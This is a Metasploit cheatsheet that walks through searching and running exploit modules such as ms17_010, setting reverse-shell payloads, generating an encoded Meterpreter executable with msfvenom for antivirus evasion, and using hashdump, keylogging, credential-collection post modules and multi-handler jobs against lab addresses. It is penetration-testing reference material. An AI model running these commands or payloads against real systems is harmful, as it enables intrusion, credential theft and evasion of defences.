Metasploit Cheatsheet

Module Structure

<No.> <type>/<os>/<service>/<name>

Example: 794 exploit/windows/ftp/scriptftp_list


Module Types

| Type | Description |
| --- | --- |
| Auxiliary | Scanning, fuzzing, sniffing, and admin capabilities |
| Encoders | Ensure payloads arrive intact at their destination |
| Exploits | Modules that exploit vulnerabilities for payload delivery |
| NOPs | Keep payload sizes consistent across exploit attempts |
| Payloads | Code that runs remotely and calls back to the attacker |
| Plugins | Additional scripts integrated within msfconsole |
| Post | Wide array of modules to gather information and pivot deeper |

Note: Only auxiliary, exploit, and post modules can be selected with the use <no.> command.


Searching Modules

search <keyword>
search eternalromance

Advanced Search Options

search cve:2009 type:exploit
search cve:2009 type:exploit platform:-linux
search type:exploit platform:windows cve:2021 rank:excellent microsoft

Search Keywords

| Keyword | Description |
| --- | --- |
| cve | Modules with a matching CVE ID |
| type | Module type (exploit, payload, auxiliary, etc.) |
| platform | Target OS/platform |
| rank | Exploitability rank (excellent, good, normal, etc.) |
| port | Target port number |
| author | Module author |
| name | Module name |
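To make the keyword syntax above concrete, here is an added example (not Metasploit's own search code) that applies `key:value` filters, the `-value` exclusion form and a bare keyword to a small constructed module index; the module names and CVE values in the index are constructed placeholders, not real references.

```python
# Added example: a minimal model of msfconsole's search keyword syntax.
# This is not Metasploit's implementation; the index below is constructed
# for illustration (CVE values are placeholders, not real references).
MODULE_INDEX = [
    {"name": "exploit/windows/ftp/scriptftp_list", "type": "exploit", "platform": "windows",
     "rank": "good", "cve": ["2009-0000"], "description": "ScriptFTP LIST overflow"},
    {"name": "exploit/linux/http/example_rce", "type": "exploit", "platform": "linux",
     "rank": "normal", "cve": ["2009-0000"], "description": "example Linux web RCE"},
    {"name": "exploit/windows/smb/ms17_010_psexec", "type": "exploit", "platform": "windows",
     "rank": "normal", "cve": ["2017-0000"], "description": "Microsoft SMB MS17-010 psexec"},
    {"name": "exploit/windows/http/example_iis", "type": "exploit", "platform": "windows",
     "rank": "excellent", "cve": ["2021-0000"], "description": "Microsoft IIS example"},
]


def parse_query(query):
    """Split a search string into (key, value, negate) triples.

    'cve:2009' -> ('cve', '2009', False); 'platform:-linux' -> ('platform', 'linux', True);
    a bare word such as 'microsoft' becomes ('text', 'microsoft', False).
    """
    terms = []
    for token in query.split():
        key, sep, value = token.partition(":")
        if not sep:
            key, value = "text", token
        negate = value.startswith("-")
        terms.append((key, value.lstrip("-").lower(), negate))
    return terms


def field_values(module, key):
    """Return the strings a keyword is matched against (substring, case-insensitive)."""
    if key == "text":  # bare keyword: match name and description
        return [module["name"], module["description"]]
    value = module.get(key, "")  # unknown keys never match
    return value if isinstance(value, list) else [value]


def term_matches(module, key, value):
    return any(value in str(v).lower() for v in field_values(module, key))


def search(modules, query):
    """Return the names of modules satisfying every term of the query."""
    terms = parse_query(query)
    return [m["name"] for m in modules
            if all(term_matches(m, k, v) != neg for k, v, neg in terms)]
```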

Search Options

| Option | Description |
| --- | --- |
| -h | Show help information |
| -o <file> | Output results to a CSV file |
| -S <string> | Regex pattern to filter results |
| -u | Use the module if there is exactly one result |
| -s <column> | Sort by column (rank, date, name, type, check) |
| -r | Reverse sort order |

Module Selection & Usage

Select Module

use <module_number>
use exploit/windows/smb/ms17_010_psexec

View Module Options

show options

Set Required Options

set RHOSTS <target_ip>
set RHOSTS 10.10.10.40
setg LHOST <attacker_ip>    # Global setting
set LPORT 4444

View Payloads

show payloads

Set Payload

set payload windows/meterpreter/reverse_tcp

Execute Exploit

run
exploit

Common Options

| Option | Description |
| --- | --- |
| RHOSTS | Target host(s) - required for most modules |
| RHOST | Single target host |
| RPORT | Target port (TCP) |
| LHOST | Attacker's IP address (for reverse shells) |
| LPORT | Attacker's listening port |
| PAYLOAD | Payload to use |
| TARGET | Target OS/architecture |

Useful Commands

| Command | Description |
| --- | --- |
| help | Show help menu |
| help search | Search command help |
| info <module> | Detailed module information |
| check | Test if target is vulnerable (if supported) |
| sessions | List active sessions |
| sessions -i <id> | Interact with session |
| background | Background current session |
| setg | Set global option (persists across modules) |
| unsetg | Unset global option |

Example Workflow

# Start msfconsole
msfconsole

# Search for exploit
search ms17_010

# Select module
use exploit/windows/smb/ms17_010_psexec

# View options
show options

# Set target
set RHOSTS 10.10.10.40

# Set payload options
setg LHOST 10.10.14.15
set LPORT 4444

# Check vulnerability (if supported)
check

# Run exploit
run

Rank Levels

| Rank | Description |
| --- | --- |
| excellent | Exploit will never crash the service |
| great | Exploit has a default target and auto-detects the target |
| good | Exploit has a default target |
| normal | Exploit is otherwise reliable |
| average | Exploit is generally unreliable |
| low | Exploit is nearly impossible to exploit |
| manual | Exploit is unstable or difficult to exploit |

Targets

Targets are identifiers for specific operating system (and software) versions; selecting one adapts the exploit module to run against that particular version.

View Targets

# From root menu (requires exploit selected first)
msf6 > show targets
[-] No exploit module selected.

# From within an exploit module
msf6 exploit(windows/browser/ie_execcommand_uaf) > show targets

Select a Target

msf6 exploit(windows/browser/ie_execcommand_uaf) > set target 6
target => 6

Example Target List

Exploit targets:
   Id  Name
   --  ----
   0   Automatic
   1   IE 7 on Windows XP SP3
   2   IE 8 on Windows XP SP3
   3   IE 7 on Windows Vista
   4   IE 8 on Windows Vista
   5   IE 8 on Windows 7
   6   IE 9 on Windows 7

Note: Setting target to Automatic lets msfconsole perform service detection before launching the attack.

Target Identification

To identify a target correctly:

  1. Obtain a copy of the target binaries
  2. Use msfpescan to locate a suitable return address

Payloads (Detailed)

Payloads are modules that aid the exploit module in returning a shell to the attacker.

Payload Types

| Notation | Type | Description |
| --- | --- | --- |
| windows/shell_bind_tcp | Single | No stage, self-contained payload |
| windows/shell/bind_tcp | Staged | Stager (bind_tcp) + Stage (shell) |

Singles

  • Self-contained payloads with exploit and entire shellcode
  • More stable but larger in size
  • Produce their result immediately after execution
  • Example: Adding a user or starting a process

Stagers

  • Wait on attacker machine for connection
  • Small and reliable
  • Set up network connection between attacker and victim
  • Examples: reverse_tcp, reverse_https, bind_tcp

Stages

  • Downloaded by stager modules
  • Provide advanced features with no size limits
  • Examples: Meterpreter, VNC Injection

List Payloads

msf6 > show payloads
msf6 exploit(windows/smb/ms17_010_eternalblue) > grep meterpreter show payloads
msf6 exploit(windows/smb/ms17_010_eternalblue) > grep meterpreter grep reverse_tcp show payloads

Select Payload

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload 15
# or
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

Common Windows Payloads

| Payload | Description |
| --- | --- |
| generic/shell_bind_tcp | Generic listener, normal shell, TCP bind |
| generic/shell_reverse_tcp | Generic listener, normal shell, reverse TCP |
| windows/x64/exec | Executes an arbitrary command |
| windows/x64/shell_reverse_tcp | Normal shell, single payload, reverse TCP |
| windows/x64/shell/reverse_tcp | Normal shell, stager + stage, reverse TCP |
| windows/x64/meterpreter/$ | Meterpreter payload + varieties |
| windows/x64/powershell/$ | Interactive PowerShell sessions |
| windows/x64/vncinject/$ | VNC Server (Reflective Injection) |
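The single-versus-staged notation from the Payload Types table and the `shell_reverse_tcp` / `shell/reverse_tcp` pairs in the table above follow one rule, shown here as an added example (not Metasploit's own code): an underscore joins stage and transport in a single payload, a slash separates them in a staged one. The transport names are the three stagers the page lists; `direction` is derived from the `reverse_`/`bind_` prefix.

```python
# Added example: interpret a Metasploit payload reference from its notation.
# Not Metasploit's own code. Rule from the page: '<stage>_<stager>' in one path
# component is a single payload; '<stage>/<stager>' is staged (stager + stage).
STAGERS = ("bind_tcp", "reverse_tcp", "reverse_https")  # transports named on the page


def classify_payload(ref):
    """Return kind (single/staged), platform prefix, stage, stager and connection direction."""
    parts = ref.split("/")
    last = parts[-1]
    if last in STAGERS and len(parts) >= 3:
        # staged: the stager opens the connection, then downloads the stage (e.g. meterpreter)
        kind, stage, stager, prefix = "staged", parts[-2], last, parts[:-2]
    else:
        # single: everything is in one component; split off a known transport suffix if present
        kind, stage, stager, prefix = "single", last, None, parts[:-1]
        for transport in STAGERS:
            if last.endswith("_" + transport):
                stage, stager = last[: -len(transport) - 1], transport
                break
    if stager is None:
        direction = None          # e.g. windows/x64/exec: no network transport at all
    elif stager.startswith("reverse_"):
        direction = "reverse"     # target connects back to LHOST:LPORT (handler listens)
    else:
        direction = "bind"        # target listens; the operator connects to RHOST:LPORT
    return {"kind": kind, "prefix": "/".join(prefix), "stage": stage,
            "stager": stager, "direction": direction}
```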

Meterpreter Commands

meterpreter > help           # Show all commands
meterpreter > getuid         # Get current user
meterpreter > sysinfo        # System information
meterpreter > shell          # Drop to system shell
meterpreter > hashdump       # Dump SAM database
meterpreter > screenshot     # Capture screenshot
meterpreter > keyscan_start  # Start keylogger
meterpreter > background     # Background session

Encoders

Encoders change payloads to run on different architectures and help with AV evasion.

Supported Architectures

  • x64, x86, sparc, ppc, mips

List Encoders

msf6 > show encoders

Common Encoders

| Encoder | Description |
| --- | --- |
| x86/shikata_ga_nai | Polymorphic XOR Additive Feedback Encoder |
| x64/xor | XOR Encoder |
| x64/zutto_dekiru | Zutto Dekiru |
| x86/alpha_mixed | Alpha2 Alphanumeric Mixedcase Encoder |
| x86/unicode_mixed | Alpha2 Alphanumeric Unicode Mixedcase Encoder |

Generate Encoded Payload with msfvenom

# Single iteration
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.14.5 LPORT=8080 -e x86/shikata_ga_nai -f exe -o payload.exe

# Multiple iterations (10)
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.14.5 LPORT=8080 -e x86/shikata_ga_nai -f exe -i 10 -o payload.exe

Check Payload with VirusTotal

msf-virustotal -k <API_key> -f payload.exe

Note: Modern AV/IPS solutions can detect encoded payloads. Multiple encoding iterations alone are often not sufficient for evasion.


Databases

Databases in msfconsole track results, credentials, and scan data using PostgreSQL.

Database Setup

# Check PostgreSQL status
sudo service postgresql status

# Start PostgreSQL
sudo systemctl start postgresql

# Initialize MSF database
sudo msfdb init

# Check database status
sudo msfdb status

Connect to Database

msf6 > db_status
[*] Connected to msf. Connection type: postgresql.

Reinitialize Database

msf6 > msfdb reinit

Workspaces

msf6 > workspace                    # List workspaces
msf6 > workspace -a Target_1        # Add workspace
msf6 > workspace Target_1           # Switch workspace
msf6 > workspace -d Target_1        # Delete workspace
msf6 > workspace -r old new         # Rename workspace

Import Scan Results

msf6 > db_import Target.xml         # Import Nmap XML

Run Nmap from MSFconsole

msf6 > db_nmap -sV -sS 10.10.10.8

View Stored Data

msf6 > hosts                        # List discovered hosts
msf6 > services                     # List discovered services
msf6 > services -p 445              # Filter by port
msf6 > services -s smb              # Filter by service name
msf6 > vulns                        # List vulnerabilities
msf6 > creds                        # List credentials
msf6 > loot                         # List loot (hashes, etc.)

Hosts Command Options

msf6 > hosts -h
  -a,--add         Add hosts
  -d,--delete      Delete hosts
  -c <col1,col2>   Only show specific columns
  -R,--rhosts      Set RHOSTS from results
  -S,--search      Search string to filter

Services Command Options

msf6 > services -h
  -p <port>        Search by port
  -r <protocol>    Protocol (tcp/udp)
  -s <name>        Service name
  -u,--up          Only show up services
  -R,--rhosts      Set RHOSTS from results

Credentials Management

# Add credentials
msf6 > creds add user:admin password:notpassword realm:workgroup
msf6 > creds add user:admin ntlm:E2FC15074BF7751DD408E6B105741864:A1074A69B1BDE45403AB680504BBDD1A
msf6 > creds add user:sshadmin ssh-key:/path/to/id_rsa

# Filter credentials
msf6 > creds -u admin              # By username
msf6 > creds -p 22                 # By port
msf6 > creds -t ntlm               # By type

Export Data

msf6 > services -o services.csv    # Export to CSV
msf6 > creds -o creds.csv          # Export credentials

Sessions

MSFconsole can manage multiple modules simultaneously using Sessions, which create dedicated control interfaces for all deployed modules.

Background a Session

# From Meterpreter - press [CTRL] + [Z] or type:
meterpreter > background

# Session will continue running in background

List Active Sessions

msf6 > sessions

Active sessions
===============

  Id  Name  Type                     Information                 Connection
  --  ----  ----                     -----------                 ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ MS01  10.10.10.129:443 -> 10.10.10.205:50501

Interact with a Session

msf6 > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

Session Commands

| Command | Description |
| --- | --- |
| sessions | List all active sessions |
| sessions -i <id> | Interact with session |
| sessions -k <id> | Kill session |
| sessions -K | Kill all sessions |
| sessions -u <id> | Upgrade shell to Meterpreter |
| background | Background current session |
| [CTRL] + [Z] | Background current session |

Using Sessions with Post Modules

Post-exploitation modules can target existing sessions:

# Background current session
meterpreter > background

# Select post module
msf6 > use post/windows/gather/credentials/credential_collector

# Set the session to run against
msf6 post(windows/gather/credentials/credential_collector) > set SESSION 1

# Run the module
msf6 post(windows/gather/credentials/credential_collector) > run

Jobs

Jobs allow running tasks in the background, freeing up the console for other work. This is useful when you need a port for a different module or want to run multiple handlers.

View Jobs Help

msf6 > jobs -h

OPTIONS:
    -K        Terminate all running jobs.
    -P        Persist all running jobs on restart.
    -S <opt>  Row search filter.
    -h        Help banner.
    -i <opt>  Lists detailed information about a running job.
    -k <opt>  Terminate jobs by job ID and/or range.
    -l        List all running jobs.
    -p <opt>  Add persistence to job by job ID
    -v        Print more detailed info.

Run Exploit as Background Job

msf6 exploit(multi/handler) > exploit -j

[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 10.10.14.34:4444

Exploit Command Options

msf6 > exploit -h

OPTIONS:
    -J        Force running in the foreground, even if passive.
    -e <opt>  The payload encoder to use.
    -f        Force the exploit to run regardless of MinimumRank.
    -j        Run in the context of a job.
    -z        Do not interact with the session after successful exploitation.

Job Management Commands

| Command | Description |
| --- | --- |
| jobs -l | List all running jobs |
| jobs -i <id> | Detailed info about job |
| jobs -k <id> | Kill job by ID |
| jobs -K | Kill all jobs |
| kill <id> | Kill job by index number |

Example: Running Multiple Handlers

# Start first handler as job
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit -j

[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 10.10.14.34:4444

# Start second handler on different port
msf6 exploit(multi/handler) > set LPORT 4445
msf6 exploit(multi/handler) > exploit -j

[*] Exploit running as background job 1.
[*] Started reverse TCP handler on 10.10.14.34:4445

# List running jobs
msf6 > jobs -l

Jobs
====

  Id  Name                    Payload                          Payload opts
  --  ----                    -------                          ------------
  0   Exploit: multi/handler  windows/meterpreter/reverse_tcp  tcp://10.10.14.34:4444
  1   Exploit: multi/handler  windows/meterpreter/reverse_tcp  tcp://10.10.14.34:4445

Note: Don’t use [CTRL] + [C] to stop an exploit using a port - the port will remain in use. Use jobs -k <id> instead to properly free the port.